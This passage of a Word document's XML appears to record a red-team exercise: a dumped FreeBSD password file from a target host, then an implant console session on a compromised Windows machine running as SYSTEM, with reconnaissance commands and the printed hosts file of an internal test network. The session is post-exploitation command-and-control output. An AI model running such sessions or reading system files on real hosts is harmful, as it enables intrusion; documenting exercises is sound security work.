    <w:p w14:paraId="658FAF3F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>news:*:8:8:News Subsystem:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5442E8AA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E4A75D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF559F3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12889DD7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1BFD6D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D5FA8B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F965F6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC9626F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D234E2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3643A5E8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C408D05" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336EED8E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419C3A46" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21747988" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ntpd:*:123:123:NTP Daemon:/var/db/ntp:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6711AE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691DE752" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B402DF3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282F921B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>darpa:*:1001:1001:DARPA:/home/darpa:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4404CC95" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bbn:*:1002:1002:bbn:/home/bbn:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07294181" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C2AF61" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCEFAF2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E0688" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CD6979" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>polkitd:*:565:565:Polkit Daemon User:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A54072C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>colord:*:970:970:colord color management daemon:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A3F003" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>git_daemon:*:964:964:git daemon:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403B7270" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kafka:*:234:234:Apache Kafka user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A21A3D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD5710C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>pgsql:*:70:70:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635EBFDC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ta3:*:1003:1003:TA3 User,None,None,None:/home/ta3:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F34758" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ta1:*:1004:1004:TA1 User,None,None,None:/home/ta1:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4404CE70" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin:*:1005:1005:Admin,None,None,None:/home/admin:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077085DE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>user:*:1006:1006:User,None,None,None:/home/user:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CC4DB3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>iswitcher:*:1007:1007:Internet Switcher Service,None,None,None:/home/iswitcher:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CD7A68" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FDDD255" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>12:53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDADCAD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66508B7F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W1        128.55.12.109:49907 --&gt;   128.55.12.167:8640  [HTTP]  Fri May 17 12:48:04 2019        active 249s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B047F3F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con W1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3692743F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B825EFE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43830267" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FFF1E0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-fivedirections-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEEEAA7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ACDF0F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] C:\Users\admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F62CDA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2357FA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF2CED0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F4D5DB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBD19A9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd drivers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108E3FD7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C33CD9C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A639D7C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9D6048" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128399E1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB2F98B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] lmhosts.sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361C3B2A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741682C9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA452A1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2102BCD6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] tc-version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01132920" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571D59C2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C095CF8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cat hosts                                                                                                                                                                 [8/1249]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E404DD8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] # Copyright (c) 1993-2009 Microsoft Corp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F71056" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683AAE46" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># This is a sample HOSTS file used by Microsoft TCP/IP for Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3C9729" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657FD0AA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># This file contains the mappings of IP addresses to host names. Each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7375029D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># entry should be kept on an individual line. The IP address should</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF240B6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># be placed in the first column followed by the corresponding host name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA973BC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># The IP address and the host name should be separated by at least one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C9E99D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A13D83E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265BA2CF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># Additionally, comments (such as these) may be inserted on individual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2481B957" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># lines or following the machine name denoted by a '#' symbol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB005CA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDADF4A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB4E99B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5072C356" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#      102.54.94.97     rhino.acme.com          # source server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBCA6F6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#       38.25.63.10     x.acme.com              # x client host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295E1AB6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># localhost name resolution is handled within DNS itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A338ED0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#       127.0.0.1       localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FA7B1B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#       ::1             localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1251A7D5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1               ta1-fivedirections-1 ta1-fivedirections-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A054DE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.58            ta1-fivedirections-translate-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE4B538" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.160           ta1-fivedirections-translate-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070906C1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.52            ta3-test-dp ta3-perf-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0054D2B0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.73            ta3-prometheus-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512362BC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.74            ta3-prometheus-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F93FF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
